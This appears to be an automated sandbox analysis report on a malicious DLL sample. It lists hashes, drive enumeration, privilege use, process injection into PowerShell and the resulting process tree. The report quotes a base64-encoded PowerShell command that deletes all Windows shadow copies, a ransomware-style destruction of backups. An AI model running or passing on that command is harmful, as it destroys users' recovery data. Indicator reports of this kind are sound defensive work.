Analysis
- max time kernel: 15s
- max time network: 124s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 04-06-2021 11:27
Static task: static1
Behavioral task: behavioral1
- Sample: 38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6.bin.sample.dll
- Resource: win7v20210408
Behavioral task: behavioral2
- Sample: 38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6.bin.sample.dll
- Resource: win10v20210410
General
- Target: 38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6.bin.sample.dll
- Size: 164KB
- MD5: 2756f86ef462729bd072ef2d05f00f54
- SHA1: b074e97c19bc69d39c235c763675b492e2e216f1
- SHA256: 38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6
- SHA512: 9c6a618870ebb1a50bd647f26327d4ab25905c8d438e1f71be87f343e91d58c0e4683afeefc7f725b091cb1a47b5e7fa30d99402fb4296a88e8a5b138ef62d14
Malware Config
Signatures
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: rundll32.exe
    description               ioc     process
    File opened (read-only)   \??\A:  rundll32.exe
    File opened (read-only)   \??\B:  rundll32.exe
    File opened (read-only)   \??\J:  rundll32.exe
    File opened (read-only)   \??\M:  rundll32.exe
    File opened (read-only)   \??\O:  rundll32.exe
    File opened (read-only)   \??\Y:  rundll32.exe
    File opened (read-only)   \??\V:  rundll32.exe
    File opened (read-only)   \??\G:  rundll32.exe
    File opened (read-only)   \??\H:  rundll32.exe
    File opened (read-only)   \??\I:  rundll32.exe
    File opened (read-only)   \??\N:  rundll32.exe
    File opened (read-only)   \??\Q:  rundll32.exe
    File opened (read-only)   \??\S:  rundll32.exe
    File opened (read-only)   \??\F:  rundll32.exe
    File opened (read-only)   \??\P:  rundll32.exe
    File opened (read-only)   \??\W:  rundll32.exe
    File opened (read-only)   \??\X:  rundll32.exe
    File opened (read-only)   \??\Z:  rundll32.exe
    File opened (read-only)   \??\E:  rundll32.exe
    File opened (read-only)   \??\K:  rundll32.exe
    File opened (read-only)   \??\L:  rundll32.exe
    File opened (read-only)   \??\R:  rundll32.exe
    File opened (read-only)   \??\T:  rundll32.exe
    File opened (read-only)   \??\U:  rundll32.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: rundll32.exe, powershell.exe
    pid   process
    3908  rundll32.exe
    3908  rundll32.exe
    4032  powershell.exe
    4032  powershell.exe
    4032  powershell.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: rundll32.exe, powershell.exe, vssvc.exe
    description                pid   process
    Token: SeDebugPrivilege    3908  rundll32.exe
    Token: SeDebugPrivilege    4032  powershell.exe
    Token: SeBackupPrivilege   2160  vssvc.exe
    Token: SeRestorePrivilege  2160  vssvc.exe
    Token: SeAuditPrivilege    2160  vssvc.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: rundll32.exe, rundll32.exe
    description                        pid   process       target process
    PID 3016 wrote to memory of 3908   3016  rundll32.exe  rundll32.exe
    PID 3016 wrote to memory of 3908   3016  rundll32.exe  rundll32.exe
    PID 3016 wrote to memory of 3908   3016  rundll32.exe  rundll32.exe
    PID 3908 wrote to memory of 4032   3908  rundll32.exe  powershell.exe
    PID 3908 wrote to memory of 4032   3908  rundll32.exe  powershell.exe
Processes
- C:\Windows\system32\rundll32.exe (PID 3016)
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6.bin.sample.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe (PID 3908)
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\38beb0ea97e3c5758b4839b8874d552a6ddce7bcde77986c62bf49041e229bc6.bin.sample.dll,#1
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4032)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe (PID 4052)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe (PID 2160)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- memory/3908-114-0x0000000000000000-mapping.dmp
- memory/4032-115-0x0000000000000000-mapping.dmp
- memory/4032-121-0x0000026F72010000-0x0000026F72011000-memory.dmp (Filesize: 4KB)
- memory/4032-126-0x0000026F721C0000-0x0000026F721C1000-memory.dmp (Filesize: 4KB)
- memory/4032-127-0x0000026F70030000-0x0000026F70032000-memory.dmp (Filesize: 8KB)
- memory/4032-128-0x0000026F70033000-0x0000026F70035000-memory.dmp (Filesize: 8KB)
- memory/4032-138-0x0000026F70036000-0x0000026F70038000-memory.dmp (Filesize: 8KB)